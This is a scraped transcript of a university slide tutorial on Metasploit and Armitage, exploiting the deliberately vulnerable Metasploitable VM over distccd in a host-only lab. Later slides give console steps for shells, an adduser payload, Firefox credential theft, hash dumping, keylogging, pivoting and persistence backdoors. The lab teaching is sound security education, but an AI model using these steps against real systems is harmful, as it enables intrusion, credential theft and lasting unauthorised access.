Presentation is loading. Please wait.

Presentation is loading. Please wait.

Metasploit a short tutorial

Published byRoberta Grasso Modified over 5 years ago

Similar presentations

Presentation on theme: "Metasploit a short tutorial"— Presentation transcript:

1 Metasploit a short tutorial
Thanks to Jos Wetzels & Wouter Bokslag

2 STATUS OF THESE SLIDES Status: third version, improved and extended tutorial which includes use of vmware. Additional slides not included in the program for the moment Additional slides need to be polished. Backrtrack Linux has been replaced by Kali linux ( The slides have not been updated yet Armitage / name of department

3 Let’s start - TBCHANGED
Students are supposed to install metasploit on their computer. The slides we make here are done using Kali lunux and armitage on the attacking side Metasploitable on the attacked side. Metasploitable is a linux distribution full of bugged services, that can be used to practice metasploit attacking skills. See: BTW: the last link is a beautiful site/tutorial on the use of linux. We start with an exercise and then we get into the explanation This exercise is *obligatory* / name of department

4 Setup Warning: much more than like running webgoat, running metasploitable makes you vulnerable also to external attacks. Be ready to be hacked. So, if you run it on your usual computer using vmware, use the network configuration “host only” This will make sure you cannot be hacked from oustide. Setup I use for this small tutorial (and for most of what I do) Mac + 2 virtual machines (one with kali 2.0, the other one with metasploitable) You can download / name of department

5 (OLD) Instructions for Windows
Instructions for Windows are probably the following (they are old, and if they are not correct, find the solution yourself, ok? Real hackers are not stopped by silly details): Download Metasploit it should comes with ARMITAGE and NMap built-in. Download VMWare Player (It’s free) Download Metasploitable Open Metasploitable in VMWare Player and run it Log in with msfadmin: msfadmin Get root using sudo su with password msfadmin Check if network connection is up & running using ifconfig/ping, else use dhclient. Note down Metasploitable IP. Start ARMITAGE (Start -> All Programs -> Metasploit Framework -> ARMITAGE) or: armitage & / name of department

6 Instructions for Linux/vmware
Install Kali and Metasploitable in two different virtual machines Make sure they are connected with the “host only” system Change the root password. Use the following command (regularly) to make sure you have the last version installed # apt-get update && apt-get upgrade Meaning “type apt-get update && apt-get upgrade ” / name of department

7 Warning Some of these slides are written from the Windows perspective.
Some others are written using Backtrack. Corrections to the slides are more than welcome. Again, you are expected to sort mismatches yourself. / name of department

8 Starting up BT with Kali
# startx (check if needed) do this only if the x-windows system doesn’t start on its own. Open a terminal window # service postgresql start (check if needed) may require: # /etc/init.d/postgresql start #service metasploit start (on Kali 1) #msfdb (on Kali 2) #armitage That will try to connect to metasploit RPC server: click “connect” If Metasploit is not running it will kindly ask you if it should start it for you. Click “yes” and be patient / name of department

9 Oops Depending on the network configuration you could get an error message: In this case…. #ifconfig eth Link encap:Ethernet HWaddr 00:0c:29:b8:b6:58 inet addr: Bcast: Mask: / name of department

10 Using ARMITAGE (the interface to Metasploit)
The juicy interface Armitage = Metasploit ++ Metasploit console / name of department

11 I’ve already “added” we see in a minute how to do this
Hosts I’ve already “added” we see in a minute how to do this The console / name of department

12 To find out the “local” hosts
With ifconfig you know what is the IP address of your (virtual) machine. You need to scan the network for the other ones. To add the hosts (one of the many ways) you can use nmap directly from Armitage Hosts > Nmap Scan > Quick Scan (OS Detect) You don’t want nmap to scan the whole network, so it is better if you have an idea which addresses you are looking for. / name of department

13 About Scanning You can initiate NMap scan through Hosts -> NMap Scan -> Intense Scan, All TCP Ports But watch out: this is a very heavyweight scan. System administrators are going to see it happening. And they'll ask you questions. Initiate Auxiliary scan through Hosts -> MSF Scans Wait until both scans complete (MSF Scan will notify you with a message box, NMap scan tab will say so) See what ports are open and what services they are running by right clicking the target -> Services / name of department

14 If the scanning went well….
You get an inviting-looking message, and now the target computer(s) is on your radar / name of department

15 Now you need to get in…. You can use “login” if you have a legitimate log in to the target system. (assume we don’t) Your goal is to find vulnerable services You can go for a deeper scan Right-click “scan”. And then …. / name of department

16 Gathering information
You have discovered the operating system (see the penguin) Now right-click “services” / name of department

17 Finally > Attacks > Find Attacks …. / name of department

18 Finding the right attack
Right click > Attack > ftp: you get to see 5 (in this case) exploits on (known vulnerabilities of) the ftp service that are known by Metasploit and that you *might* be able to use to attack the target. There is no guarantee that the target actually is actually vulnerable to any of them. So which one should you use? The hard way is to look at the features of the attacks one by one (more on how to do this later) and see if they match the target. The easy way is to use the “check” function. NB: not all exploit can be “checked” Let’s try it… / name of department

19 Some tries…. / name of department

20 So far, little luck If we check the ftp exploit, we get only two types of results: [*] This exploit does not support check The target might be exploitable, but you don’t know, OR [*] The target is not exploitable Meaning the target does not contain the vulnerability needed by the exploit. Perhaps it has been patched, or it uses sw that does not match the exploit. So? We try other attacks. For instance: Attack > misc > distcc_exec, Exploiting service distccd / name of department

21 Bingo! So this is something we can and will use.
To do so, we’d better first learn how to use the MSF console. Which is the leftmost tab in the lower part of the screen / name of department

22 Exploitation, the graphical way…
Find suitable attack suggestions (as opposed to manually identifying them) Attacks -> Find Attacks - When message box notifies you attacks have been found, ‘Attack’ menu is added to host rightclick-menu. Find vulnerable services by rightclick target -> Attack -> ‘Service name’ -> Check Exploits This will open a tab which runs ‘check’ method for each possible exploit, Press CTRL+F and search for vulnerable. Some exploit modules do not support `check` method, try these manually or check their descriptions. You can also search manually in the left-hand menu under ‘exploits’. / name of department

23 But old pros like you use the MSF Console
It is the only supported way to access most of the features within Metasploit Provides a console-based interface to the framework Contains the most features and is the most stable MSF interface Full readline support, tabbing, and command completion Execution of external commands in msfconsole is possible / name of department

24 Some of the commands While using MSFConsole other commands become available: Check -> check if target is vulnerable to selected exploit (not always supported) Exploit -> Run exploit with set configuration Run -> Run auxiliary with set configuration / name of department

25 Command-line Search Type `search distcc
We know that our target is attackable via the distcc_exec exploit We now want to build the attack from the console First we need to find the exploit (this *does* work in KALI) Type `search distcc You might have to be patient waiting for the answer / name of department

26 Note Here you see as result exploit/unix/misc/distcc_exec ,
but on your release the directory may vary. Now you want to know more about this exploit. So you invoke: info exploit/unix/misc/distcc_exec / name of department

27 (not included in this screenshot)
+ references (not included in this screenshot) / name of department

28 Options TBD: check the automatic targeting
As you can see there are two basic options: RHOST -> Contains the target address RPORT -> Contains the target port The info also notifies you that the maximum payload space is 1024 bytes and targeting is done automatically (instead of having to select one depending on target host details) We’ll get back to this payload thing in a second. Type `use exploit/unix/misc/distcc_exec` to use the exploit You enter in “exploitation mode” Type `help` to view the exploit commands / name of department

29 Exploit Commands So: what can we do with this exploit?
In itself, it simply sets the first step in a (e.g.) buffer overflow. And what can we do as second step? Meet the payload…. / name of department

30 The carrier and the payload
distt_exec is basically a “carrier”, that can probably carry many different kind of payloads. Our goal is to get full control of the target machine, so let’s see if we can do this using this carrier. / name of department

31 Let’s choose a Payload We know we have 1024 bytes of payload space (which is enough for a lot of purposes). Let’s see what you can do with it, type show targets (here not needed because it is an “automatic target exploit) show payloads (next slide) / name of department

32 Show Payloads A shell is what you want to get.
Bind TCP: a shell on the target machine, which listens to a given port. Reverse TCP: a shell on the target machine, which connects back to the attacking one (bye bye firewall… no problem with NAT translations etc ) Two years ago there were half as many payloads…. Type ‘info cmd/unix/bind_perl` to display information about this payload / name of department

33 Info on bind_perl / name of department

34 Set payload; show options
Options of the exploit Options of the specific payload / name of department

35 Going on…. Type `set RHOST 192.168.232.128` to select our target
Since our RPORT is already set correctly and RHOST isn’t necessary for the payload we won’t set those Our bindshell will listen on port (????, in other images) if it is executed successfully, keep in mind this port has to be free and preferably above 1024 (since most services don’t run as root – and only root can listen to ports below 1024) For some exploits, we can type `check` to see if the target is vulnerable, we won’t do it for this one though Type `show evasion` to show evasion methods (we will not select any) Now type `exploit` to exploit our target / name of department

36 Alternative way to set LPORT, etc …
Set LHOST to the IP of the attacking machine (if you’re not using a pivot, this is your own IP) Let LPORT be whatever it is Set RHOST to be the IP of the target machine Set RPORT to be the port of the vulnerable service (in this case 3632 of distccd) Click Launch / name of department

37 BINGO!!! Notice how armitage tells you that the target has been compromised. Now we can do basically anything on it. / name of department

38 Graphical Notation / name of department

39 Did you succeed? If you are successful, the target machine icon will be red with electric jolts and the console tab will notify you have a shell. A menu option for the shell will be added to the rightclick menu of the target. NOTE: For Unix targets a shell is the default payload, for Windows targets a meterpreter session is the default payload. These can be modified through working from the console tab and using MSFConsole instead of the GUI. Results are added to the GUI though. Interact with Shell 1, you now have compromised the target machine. / name of department

40 Meterpreter? (1) Typically, you want to have a shell on the target system So the payload executes a command interpreter Like /bin/sh/ This approach, however, has disadvantages: (think about it a sec) Easily detectable: The execution of a program involves the creation of a process, which can be detected by a host-based intrusion detection system (whitelisting) Chroot problem. If the application you exploit is chrooted, then it is impossible for it (and thus for your payload) to refer to objects outside the chrooted environment. So you can't call the /bin/sh altogether (there appear to be ways out of this, but if you are at that level you should not sit in this class) Limitation of the command interpreter which may have access to a limited set of commands / name of department

41 Meterpreter! (2) The meterpreter is a meta-interpreter that runs within the exploited application. Evades the problems we mentioned so far NOT Easily detectable. The meterpreter does not need to start a new process. Also, the meterpreter extensions, and the meterpreter server itself, are all executed entirely from memory (technique called called Remote Library Injection) In some cases the injected application keeps on running. DOES NOT HAVE A Chroot problem. It executes all commands within the exploited application, so it doesn't have to access other resources (which would be difficult in the case of a chrooted application) DOES NOT SUFFER Limitations of the command interpreter, actually you can write your own command extensions as long as they can be compiled into a DLL. / name of department

42 For intstance We can start a shell
Notice the extra menu item “Shell 1” that has appeared when you right click. Click “interact”, and what you get is / name of department

43 A shell on the target machine
It appears as new tab in the bottom window. / name of department

44 You upload some files Use: Try it on a custom file
Then go to your console, type “ls” and notice that the file has been uploaded. It could be an executable, of course. / name of department

45 You can pass the session to yourself or someone else.
Once you exploit a host, duplicating your access should be a first priority. Meterpreter N -> Access -> Pass Session will inject meterpreter into memory and execute it for you. By default this option is configured to call back to Armitage's default Meterpreter listener. Just click Launch. You may also use Pass Session to send meterpreter to a friend. Set LPORT and LHOST to the values of their Meterpreter multi/handler. If your friend uses Armitage, have them type set in a Console tab and report the LHOST and LPORT values to you. These are the values for their default Meterpreter listener. So if you launch on Pass Session, you’ll get a second shell / name of department

46 Post-exploitation modules
Now you are in, you have control of the target, but you want to carry out specific tasks, like keylogging. You can use one of the many ready post exploitation modules. Exercise: try some of these exploitation modules. / name of department

47 For instance Post-module firefox_creds… / name of department

48 Payload Usage in Armitage
ARMITAGE has static payloads (Shell for Unix target, Meterpreter for Windows target) but supports MSFConsole in a tab. Great use of payloads in ARMITAGE: Generating payload executables Let’s generate Payload ELF. / name of department

49 Take a look at "adduser” (1/3)
Either use left-hand menu, or / name of department

50 Take a look at "adduser” (2/3)
but old pros like you use the MSFConsole. > use payload/linux/x86/adduser (note: requires root shell!) > set USER metasploit > set PASS metasploit > generate –t elf –f C:\\dir\\naughtyelf (don’t use double-quotes) / name of department

51 Take a look at "adduser” (3/3)
And now you can upload it…. Rightclick target -> Shell1 -> Upload -> Select naughtyelf Rightclick target -> Shell1 -> Interact $ chmod +x ./naughtyelf $ ./naughtyelf $ cat /etc/passwd (and verify a new user named metasploit is added) / name of department

52 Let’s Recapitulate / name of department

53 Metasploit: a framework for penetration testing and exploitation
Metasploit is an open source / name of department

54 Metasploit Architecture
TOOLS PLUGINS LIBRARY MODULES Exploits Payloads Encoders Nops Auxiliary / name of department

55 Exploits For a single vulnerability for a set of targets
Active exploits (attack a specific host) Passive exploits; wait for a connection and try to exploit the connecting application (e.g. the web browser) / name of department

56 Payloads Generate stand-alone shellcode or can be selected for use in exploits Three types Inline/Single. Standalone, self-contained shellcode (Eg. Adding a user to a system) Stager. Sets up network connection between victim and attacker (Eg. Bindshells, reverse connect shell,etc.) Stages. Payload components downloaded by Stager module, provide advanced features with no size limit (Eg. Meterpreter, VNC injection,etc.) / name of department

57 Encoders Encoders encode a payload and prefix a decoder to evade detection Must not touch certain registers Must be under a max size Must avoid bad characters (NULL bytes,newlines,etc.) We'll get back to this when we describe how to write your own module. Can generate alphanumeric shellcode (ASCII-printable shellcode) / name of department

58 And now: Armitage / name of department

59 ADDITIONAL SLIDES TO BE INCLUDED (ONE DAY)
/ name of department

60 Meterpreter in Armitage
Assume we have exploited a Windows machine and have a running Meterpreter session. This can be achieved without exploitation through the left-hand menu -> Payloads -> Windows -> Meterpreter -> bind_tcp and generating a EXE file containing the meterpreter payload. After running it on the target machine, go to ARMITAGE -> Listeners -> Bind and connect to the port of the Meterpreter session to compromise the target machine Can be used to browser files, list processes, run VNC session, make screenshots,etc. / name of department

61 / name of department

62 System Access & Escalation
Meterpreter -> Access -> Escalate Privileges to get highest possible privileges (potentially SYSTEM) Meterpreter -> Access -> Dump Hashes to dump System hashes, view -> Credentials to view them. These can be used in `Pass the hash` attack or cracked using Cain or John The Ripper Meterpreter -> Access -> Migrate Now migrates the Meterpreter session to a new process Meterpreter -> Explore -> Key Scan Initiates a keylogger on the target machine, logging all pressed keys. / name of department

63 ARP Scan Meterpreter -> ARP Scan
ARP Scanning finds hosts on the same network as the compromised host Pick the subnet you’re interested in and click ARP Scan, this adds hosts in the same subnet to your ARMITAGE target list / name of department

64 Pivoting Pivoting is routing your metasploit attacks through a compromised host In order to setup pivoting rightclick the target -> Meterpreter -> Pivot -> Setup Select the subnet you want to pivot through the session Once setup, green lines will be drawn between the host and all reachable targets The line will become bright green when the pivot is in use To use a pivot host for a reverse connection, set the LHOST variable in the exploit launch dialog to the IP address of the pivot host. / name of department

65 / name of department

66 Maintaining access using persistence
Meterpreter console -> run persistence –U –I 5 –p 1337 –r Interacting with the backdoor is done by ARMITAGE -> Listeners -> Reverse (wait for) with the correct port number. When the target machine boots, a meterpreter connection will be spawned. / name of department

67 Other way to maintain access
Creating a persistent meterpreter backdoor service (METSVC) allows us to maintain access right click target -> Meterpreter -> Access -> Persist Interacting with the backdoor is done by ARMITAGE -> Listeners -> Reverse (wait for) with the correct port number. When the target machine boots, a meterpreter connection will be spawned. / name of department

68 Handy Commands ifconfig: to see which interfaces are open
lsof (list of open files, tipico: lsof -i –P) to see which programs are listening to which ports (in unix, sockets are files). / name of department

Download ppt "Metasploit a short tutorial"

Similar presentations

Lecture 10 Sharing Resources. Basics of File Sharing The core component of any server is its ability to share files. In fact, the Server service in all.

Lecture 10 Sharing Resources. Basics of File Sharing The core component of any server is its ability to share files. In fact, the Server service in all.
DNR-322L & DNR-326.

DNR-322L & DNR-326.
Welcome to the MIRC & NoName Script Tutorial Created by Buzz & Jet 1/31.

Welcome to the MIRC & NoName Script Tutorial Created by Buzz & Jet 1/31.
A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.

A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.
Calendar Browser is a groupware used for booking all kinds of resources within an organization. Calendar Browser is installed on a file server and in a.

Calendar Browser is a groupware used for booking all kinds of resources within an organization. Calendar Browser is installed on a file server and in a.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.

ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
(NHA) The Laboratory of Computer Communication and Networking Network Host Analyzer.

(NHA) The Laboratory of Computer Communication and Networking Network Host Analyzer.
New School Websites Teacher Pages. Visit the SCUSD Website for videos tutorials: www.scusd.edu/website-training-teachers For more information.

New School Websites Teacher Pages. Visit the SCUSD Website for videos tutorials: For more information.
How to Upload Your File to Office Live Workspace Ed McCorduck CPN 100/101: Writing Studies I/II on Computer SUNY Cortland

How to Upload Your File to Office Live Workspace Ed McCorduck CPN 100/101: Writing Studies I/II on Computer SUNY Cortland
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.

Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.
HCare access on an iPad hCare access is the remote access to PGH. The steps for installing vary from the Mac somewhat. This will guide you. Installation.

HCare access on an iPad hCare access is the remote access to PGH. The steps for installing vary from the Mac somewhat. This will guide you. Installation.
Hosted Exchange 2007. The purpose of this Startup Guide is to familiarize you with ExchangeDefender's Exchange and SharePoint Hosting. ExchangeDefender.

Hosted Exchange The purpose of this Startup Guide is to familiarize you with ExchangeDefender's Exchange and SharePoint Hosting. ExchangeDefender.
One to One instructions Installing and configuring samba on Ubuntu Linux to enable Linux to share files and documents with Windows XP.

One to One instructions Installing and configuring samba on Ubuntu Linux to enable Linux to share files and documents with Windows XP.
Eucalyptus Virtual Machines Running Maven, Tomcat, and Mysql.

Eucalyptus Virtual Machines Running Maven, Tomcat, and Mysql.
Lab How to Use WANem Last Update 2011.08.01 1.1.0 Copyright 2011 Kenneth M. Chipps Ph.D. www.chipps.com 1.

Lab How to Use WANem Last Update Copyright 2011 Kenneth M. Chipps Ph.D. 1.
MIS 5212.001 Week 2 Site:

MIS Week 2 Site:
EECS 354 Network Security Metasploit Features. Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or.

EECS 354 Network Security Metasploit Features. Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or.
0Gold 11 0Gold 11 LapLink Gold 11 Firewall Service How Connections are Created A Detailed Overview for the IT Manager.

0Gold 11 0Gold 11 LapLink Gold 11 Firewall Service How Connections are Created A Detailed Overview for the IT Manager.
FTP Server and FTP Commands By Nanda Ganesan, Ph.D. © Nanda Ganesan, All Rights Reserved.

FTP Server and FTP Commands By Nanda Ganesan, Ph.D. © Nanda Ganesan, All Rights Reserved.
Booting Ubuntu Linux Live CSCI 130 – Fall 2008 Action Lab Dr. W. Jones.

Booting Ubuntu Linux Live CSCI 130 – Fall 2008 Action Lab Dr. W. Jones.

Similar presentations

Ads by Google